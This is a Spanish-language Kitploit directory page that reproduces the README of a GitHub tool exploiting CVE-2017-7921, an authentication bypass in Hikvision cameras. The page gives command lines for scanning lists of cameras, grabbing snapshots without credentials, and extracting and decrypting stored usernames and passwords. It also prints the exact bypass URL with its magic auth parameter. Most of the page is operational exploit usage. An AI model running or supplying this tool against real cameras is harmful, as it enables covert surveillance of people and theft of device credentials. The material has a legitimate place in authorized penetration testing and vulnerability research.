Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-7921 — Omisión de autenticación de HikVision CVE, la herramienta puede extraer credenciales y tomar instantáneas basadas en magic cookie o credenciales suministradas. | Kitploit
Herramientas/GitHubGitHub/mverschu/cve-2017-7921
ReconocimientoSeguridad IoTAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónAutenticación
GitHubmverschu/cve-2017-7921

CVE-2017-7921

Omisión de autenticación de HikVision CVE, la herramienta puede extraer credenciales y tomar instantáneas basadas en magic cookie o credenciales suministradas.

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de Listado y Captura de Instantáneas de Cámaras Hikvision

Herramienta independiente para listar cámaras Hikvision desde un archivo y tomar una instantánea de cada una usando credenciales válidas (HTTP Basic o Digest auth) o la omisión de autenticación CVE. Diseñada para ejecutarse en otro equipo con fines de prueba.

Características

  • Listar cámaras desde un archivo de texto (un host o host:puerto por línea).
  • Verificar (CVE) – probar cada cámara para la omisión de autenticación mágica por CVE (sin credenciales); --save-snapshot opcional para dispositivos vulnerables.
  • Credenciales – extraer usuario/contraseña de cada cámara mediante el CVE (autenticación mágica + descifrado de configuración). Requiere OpenSSL.
  • Verificar autenticación – confirmar que el usuario/contraseña son aceptados por cada cámara (no se guardan instantáneas).
  • Instantánea de todas – obtiene una imagen por cámara (credenciales válidas, o --exploit para usar la omisión CVE sin credenciales).
  • Solicitudes concurrentes (trabajadores configurables).
  • Autenticación Digest HTTP opcional; --merge opcional para construir una imagen general. Dependencias: requests, Pillow (para --merge).

Requisitos

  • Python 3.8+
  • requests

Instalación

root@kitploit:~
pip install -r requirements.txt

Archivo de lista de cámaras

Crea un archivo de texto con una cámara por línea. Los comentarios con # se ignoran.

root@kitploit:~
# Ejemplo cameras.txt
192.168.1.100
192.168.1.101:80
nvr.local:8080

Uso

Listar cámaras

Imprime las cámaras leídas del archivo (no se necesitan credenciales).

root@kitploit:~
python hikvision_snapshots.py cameras.txt list

Verificación de alcance opcional (GET HTTP a cada host):

root@kitploit:~
python hikvision_snapshots.py cameras.txt list -v

Verificar (CVE)

Prueba cada cámara para el CVE de omisión de autenticación de instantánea de Hikvision. No se requieren credenciales.

root@kitploit:~
python hikvision_snapshots.py cameras.txt check

Guardar instantáneas solo para cámaras vulnerables:

root@kitploit:~
python hikvision_snapshots.py cameras.txt check --save-snapshot -o ./vuln_snapshots

Opciones: --timeout, --workers, -o (para --save-snapshot).

Credenciales (extraer)

Extrae credenciales de cada cámara mediante el CVE (autenticación mágica para obtener lista de usuarios y archivo de configuración, luego descifra la configuración). Requiere OpenSSL en el equipo. No se necesitan credenciales para ejecutar.

root@kitploit:~
python hikvision_snapshots.py cameras.txt credentials

Opciones: --timeout, --workers.

Verificar autenticación

Verifica que tus credenciales funcionen en cada cámara (usa los mismos endpoints de instantánea; no guarda imágenes).

root@kitploit:~
python hikvision_snapshots.py cameras.txt auth-check -u admin -p YourPassword

Opciones: --timeout, --workers, --digest (igual que instantánea).

Instantánea de todas las cámaras

Toma una instantánea por cámara y la guarda como JPEG. Usa credenciales válidas o --exploit (omisión de autenticación CVE, sin credenciales).

root@kitploit:~
# Con credenciales
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword

# Con exploit CVE (sin credenciales)
python hikvision_snapshots.py cameras.txt snapshot --exploit
  • Las instantáneas se guardan en snapshots/ por defecto (usa -o para cambiar).
  • Los nombres de archivo se derivan del host o host_puerto (ej. 192_168_1_100.jpg, nvr_local_8080.jpg).

Opciones:

Con --merge, después de guardar cada instantánea, la herramienta construye una imagen de cuadrícula única (overview.jpg) en el directorio de salida con una celda por cámara y una etiqueta. Requiere Pillow (pip install Pillow).

Ejemplo con salida personalizada y autenticación Digest:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p secret -o ./images --digest --timeout 20

Ejemplo con imagen general fusionada:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword --merge
# o con exploit (sin credenciales):
python hikvision_snapshots.py cameras.txt snapshot --exploit --merge -o ./out

Endpoints

Instantánea autenticada (con credenciales): el script prueba en orden – /ISAPI/Streaming/channels/1/picture, /ISAPI/Streaming/channels/101/picture, /onvif-http/snapshot.

CVE (check / --exploit): /onvif-http/snapshot?auth=YWRtaW46MTEK (omisión de autenticación mágica, sin credenciales).

Ejecutar en otro equipo

  1. Copia hikvision_snapshots.py, requirements.txt y tu archivo de lista de cámaras al equipo.
  2. Instala: pip install -r requirements.txt
  3. Ejecuta list para verificar el archivo; usa check para el CVE, auth-check para las credenciales, o snapshot (con -u/-p o --exploit).

Asegúrate de que el equipo tenga acceso de red a todas las IPs y puertos de las cámaras.

Descargar herramienta
OpciónDescripciónPredeterminado
-u, --usernameNombre de usuario de la cámararequerido a menos que --exploit
-p, --passwordContraseña de la cámararequerido a menos que --exploit
--exploitUsar omisión de autenticación mágica CVE (sin credenciales)desactivado
-o, --output-dirDirectorio para las imágenes de instantáneassnapshots
--timeoutTiempo de espera HTTP en segundos15
--workersNúmero de solicitudes de instantánea concurrentes10
--digestUsar autenticación HTTP Digest en lugar de Basicdesactivado
--mergeFusionar todas las instantáneas en una imagen generaldesactivado
--merge-columnsColumnas de la cuadrícula para la fusión (predeterminado: automático)automático